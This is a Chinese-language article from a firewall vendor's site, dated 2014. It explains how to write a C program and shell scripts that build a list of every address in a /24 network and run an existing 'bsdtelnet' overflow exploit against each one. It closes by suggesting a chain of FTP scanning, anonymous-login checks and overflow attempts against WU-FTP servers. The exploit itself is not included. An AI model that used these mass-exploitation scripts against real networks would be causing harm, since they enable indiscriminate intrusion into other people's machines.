关于冰盾 | 使用条款 | 网站地图
 
关于扫描的技巧与实战
关于扫描的技巧与实战
作者:冰盾防火墙 网站:www.bingdun.com 日期:2014-11-21
 
 面我们就以一个简单的扫描一个C类IP里BSDTELNET漏洞机器为例子来看看: 
$cat num.c 
main() 
{ 
int x; 
for (x=0;x<256;x++) 
printf ("%d\n",x); 
} 
上面这段C我想不用我多说了吧,他生成一个C类网的网络号,大家在编译后可以./num >>num.txt来得到这个文本. 

#!/bin/sh 
echo -n "please ernter a ip:" 
read ipip 
list=`cat num.txt` 
for listip in $list 
do 
echo $ipip.$listip 
echo >>iplist.txt $ipip.$listip 
done 
上面这段我们来说说,read ipip是接受键盘的信息,用来给你输入1.1.1这样一个C 段地址以便与下面的LISTIP合并成真正的ip,list='cat num.txt'是读取我们刚才生成的num.txt里1-254的网络号,for listip in $list是把刚才list里的num.txt 内容循环读给listip,然后我们用echo $ipip.$listip就可以得到一个真正的ip了,再通过echo >>iplist.txt $ipip.$listip把最后得到的IP写到iplist.txt.通过以上步骤,我们得到了一个c类ip,下面我们就来用我们事先就有的bsdtelnet溢出代码来扫描他们了,如下: 

#!/bin/sh 
list=`cat iplist.txt` 
for listip in $list 
do 
./bsdtelnet -c $listip 
done 

list='cat iplist.txt'读取刚才我们生成的iplist.txt文本,for listip in $list把list里存放的ip循环送给listip, 看这个./bsdtelnet -c $listip,这个 
就是调用我们在当前这个SHELL所在的目录执行我们的exploit来对ip进行探测. 

全部结束,好了,细心的朋友可能发现了,这样的扫描似乎很慢,呵呵,确实,因为这样他不管23端口有没有开,不管对方机器是不是BSD的,他都要去溢出试试,在这里,我只是通过TOMYCHEN兄提供给大家一个巧妙利用SHELL的思路,具体大家可以自己发挥,比如先在SHELL里调用扫描器扫描,然后把开放有21端口的机器保存下面, 然后再对开了21端口的机器进行验证看是否可匿名,得到会话返回消息,如果是WU-FTP260等,就可以再调用溢出程序进行测试呀等等.
 

 
最新内容:
关于新一代的DDoS攻击方法[2014-11-21]
从接入节点谈黑客和DDOS攻击防御[2014-11-21]
亲身体验DDOS硬件防火墙DIY[2014-11-21]
DDOS防火墙在企业机房中的应用介绍[2014-11-21]
我写CC DDOS攻击器的思路及防范方法[2014-11-21]
检测电脑是否存在间谍软件的最好方法[2014-11-21]
相关内容:

合作伙伴: 黑基网 补天科技 威盾科技 站长下载 新飞金信 北京电信 ZOL应用下载
中华人民共和国增值电信业务经营许可证京ICP备14024464 公安备案号 京1081234 
版权所有©2003-2016 冰盾防火墙  www.BingDun.com 法律声明
服务热线:(010)51661195